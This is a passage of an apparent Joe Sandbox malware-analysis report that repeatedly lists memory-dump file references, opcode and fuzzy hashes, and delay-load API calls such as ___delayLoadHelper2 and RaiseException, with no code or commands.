                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 97aee0062237b5fcf9e74702a23a524b701a132e796d2801801881838b355d33
                                                                                                                                          • Instruction ID: 411bb4deee4fd72223c4881daab9da2da8dece1b95911a18ab457d816a0a74f3
                                                                                                                                          • Opcode Fuzzy Hash: 97aee0062237b5fcf9e74702a23a524b701a132e796d2801801881838b355d33
                                                                                                                                          • Instruction Fuzzy Hash: D1B012E53982C4BD712821469D02C7B020DC3C1F20330C43EFD1AD0CA1DD40AC413871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 523c592c024f27818e5d183c0eb6ec97b55bc97966e98b08de6e34458a8e8bd4
                                                                                                                                          • Instruction ID: 7a7cc5a3032ba48e72c206af51a6516c6e3e535410dcc67dc1c67471c3b6c866
                                                                                                                                          • Opcode Fuzzy Hash: 523c592c024f27818e5d183c0eb6ec97b55bc97966e98b08de6e34458a8e8bd4
                                                                                                                                          • Instruction Fuzzy Hash: 1AB012E539C288AD7168614A9D02C7B020DD3C0F20330803EF91EC08A1DD406C413971
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: fa260755001bed85d61de892d65388c6e71b2b88f50c2b475b13a7cbfdf01f57
                                                                                                                                          • Instruction ID: 2b51a2e9564773dfdcc54c292f839e9b57da7195ac68b6124d9014c022f8b3d5
                                                                                                                                          • Opcode Fuzzy Hash: fa260755001bed85d61de892d65388c6e71b2b88f50c2b475b13a7cbfdf01f57
                                                                                                                                          • Instruction Fuzzy Hash: DFB012E13981C4AC716866069D02C7B024DC3C1F20334C03EFD1AC09E1DD40AC452871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: ba38f4d39c4dc6739e71e7633acb0449be7c8ca9b19196386a9a0a402f222934
                                                                                                                                          • Instruction ID: 36a49485081ebfecb9f0cf7c896eb04eb049fc05058640f46c4071486c005949
                                                                                                                                          • Opcode Fuzzy Hash: ba38f4d39c4dc6739e71e7633acb0449be7c8ca9b19196386a9a0a402f222934
                                                                                                                                          • Instruction Fuzzy Hash: E9B012E1398194AC716862069E02C7B420DC3C0F20334C03EF91AC09E1DD506D4A2871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 55145d376569c8198a5570ee03a8c31c65622d4ed98a75ab853935aa7436bed9
                                                                                                                                          • Instruction ID: 7e2a48c90b3c99f71f063d15e89038236b8b8889ef20807983bed1bc33feb746
                                                                                                                                          • Opcode Fuzzy Hash: 55145d376569c8198a5570ee03a8c31c65622d4ed98a75ab853935aa7436bed9
                                                                                                                                          • Instruction Fuzzy Hash: 27B012E13982C4BC71A862069D02C7B020DC3C0F20334C53EF91AC09E1DD406C852871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 664e72f82bba45226836540ea449bc1ae4a5435f191908a27a0a5eec7950fa58
                                                                                                                                          • Instruction ID: cd238c67db059782bf257b514786274968b3d1efd4dc36804c4edbabf8fa7385
                                                                                                                                          • Opcode Fuzzy Hash: 664e72f82bba45226836540ea449bc1ae4a5435f191908a27a0a5eec7950fa58
                                                                                                                                          • Instruction Fuzzy Hash: DFB012F13981C4BC716861069D02C7B020DC3C1F20330C13EFD1AC08A1DD40AD412871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 42f4897776cc1f801e93499b68581e47fd61535ff7ffad91d8afafd3c65c459f
                                                                                                                                          • Instruction ID: eb415648cae178e758a2ef7b696b859da7752f965f6cf1321d97d7282d17e2c5
                                                                                                                                          • Opcode Fuzzy Hash: 42f4897776cc1f801e93499b68581e47fd61535ff7ffad91d8afafd3c65c459f
                                                                                                                                          • Instruction Fuzzy Hash: 35B012F1398284BC71A861069D02C7B020DC3C0F20330813EF91AC08A1DD406D812871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 53a4ef64c2b15248cef2272e8b15031914bc41aac654a0c94cc24baed31444f3
                                                                                                                                          • Instruction ID: 0cdcbe2dbb4ae84c2e1bc2116ed1eae4f7559632048bcde50d0ce6a09782615a
                                                                                                                                          • Opcode Fuzzy Hash: 53a4ef64c2b15248cef2272e8b15031914bc41aac654a0c94cc24baed31444f3
                                                                                                                                          • Instruction Fuzzy Hash: 56B012F1398184AC716861079D02C7B420DD3C0F20330803EF91AC08A2DD406D412871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: e607cbd76f44967da0be2e69bb3ae8d7d3e0622e86a6ce3c297ba38c3bdf8e0f
                                                                                                                                          • Instruction ID: 19789d4e9773ca69c73399b1ead86ddf4003c22457d6c7557d2cd63cbfbd83dd
                                                                                                                                          • Opcode Fuzzy Hash: e607cbd76f44967da0be2e69bb3ae8d7d3e0622e86a6ce3c297ba38c3bdf8e0f
                                                                                                                                          • Instruction Fuzzy Hash: 5CB012F1398184AC716861069E02C7B420DC3C0F20330803EF91AC08A1DD406E422871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: a84fcc45ccf44965ef776587587ad002457b179caea7a7515c0456ed06afe08b
                                                                                                                                          • Instruction ID: 3432035bdb224b655dfb9fcc587617bcf7873c338f26e4793e05bec681ccf482
                                                                                                                                          • Opcode Fuzzy Hash: a84fcc45ccf44965ef776587587ad002457b179caea7a7515c0456ed06afe08b
                                                                                                                                          • Instruction Fuzzy Hash: 34B012E13991C4AC716861069D02C7B020EC3C1F20330C03EFD1AC08A1DD40AC412871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 32b4bcca9a21662c3e4fa8e83eff94c5bd5e5f3b0754fb0c2ab1e1ec413b3990
                                                                                                                                          • Instruction ID: c882961808b927c08d228158b3200db8628135029c5a82a6657cb8d41270e3ec
                                                                                                                                          • Opcode Fuzzy Hash: 32b4bcca9a21662c3e4fa8e83eff94c5bd5e5f3b0754fb0c2ab1e1ec413b3990
                                                                                                                                          • Instruction Fuzzy Hash: 95B012F13992C4BC71A862069D02C7B020EC3C0F20330813EF91AC08A1DD406C852871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 9c82ba34888779532194913c5f7a2db58d55c9dbf6812a8ba5ccc561a16e8977
                                                                                                                                          • Instruction ID: 6a52c200bc64260afa37d7a4e8ced3e3b0e77b7dcc04bb6ffd4868ff70cafc1c
                                                                                                                                          • Opcode Fuzzy Hash: 9c82ba34888779532194913c5f7a2db58d55c9dbf6812a8ba5ccc561a16e8977
                                                                                                                                          • Instruction Fuzzy Hash: 91B012E53981C4AC716862169D02C7B024DC3C1F20330C03EFE1AD08A1DE40AC412871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 00e093f2a7aca46418df7e071f0349b107cd087ad26c681bff8d2592af22b195
                                                                                                                                          • Instruction ID: 4ecb81088d57c856bffc13d9ce7904f4ebce71a0bf12e6d5d76137f333d94eae
                                                                                                                                          • Opcode Fuzzy Hash: 00e093f2a7aca46418df7e071f0349b107cd087ad26c681bff8d2592af22b195
                                                                                                                                          • Instruction Fuzzy Hash: 54B012E13A91C4AC716861069D02C7B024ED7C0F20330803EF91BC08A1DD406C412871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: a3892e1ca910dd746b18496e14a514189e6a2e5184b434e54e2dbc6f39d3a30f
                                                                                                                                          • Instruction ID: 54cdbb92b78432a1e6aa2ffc606617c086a397b0eecd01cc214ba34af34244a8
                                                                                                                                          • Opcode Fuzzy Hash: a3892e1ca910dd746b18496e14a514189e6a2e5184b434e54e2dbc6f39d3a30f
                                                                                                                                          • Instruction Fuzzy Hash: 56B012F1398184AC716862069E02C7B428DC3C0F20330803EF91AD08A1DD406D422871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
